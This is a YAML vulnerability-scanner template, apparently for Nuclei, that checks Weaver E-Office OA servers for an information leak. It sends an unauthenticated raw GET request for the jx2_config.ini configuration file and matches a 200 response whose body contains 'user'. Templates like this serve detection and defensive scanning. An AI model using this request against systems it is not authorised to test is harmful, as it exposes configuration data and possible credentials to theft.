id: fanweiOA-E-Office-jx2-config-information-xielou

info:
  name: 泛微E-Office-jx2_config存在信息泄露漏洞
  author: cnaq
  severity: high  
  description: 泛微E-Office-jx2_config存在信息泄露漏洞
  reference: 
    - https://github.com/wy876/POC/blob/main/%E6%B3%9B%E5%BE%AEE-Office-jx2_config%E5%AD%98%E5%9C%A8%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md#%E6%B3%9B%E5%BE%AEe-office-jx2_config%E5%AD%98%E5%9C%A8%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E
  tags: lfi,ecology,fanwei,oa


requests:
  - raw:
      - |
        GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: LOGIN_LANG=cn; PHPSESSID=265e1c6495a3bd40146196a1a42cd8dd
        Upgrade-Insecure-Requests: 1


    matchers-condition: and  
    matchers:
      # 漏洞返回页面无特征，使用过滤方式减少误报
      # 基本条件1 响应状态
      - type: status
        status:
          - 200
      # 高级条件 内容必有的单字符
      - type: word
        part: body
        words:
          - 'user'
        condition: and

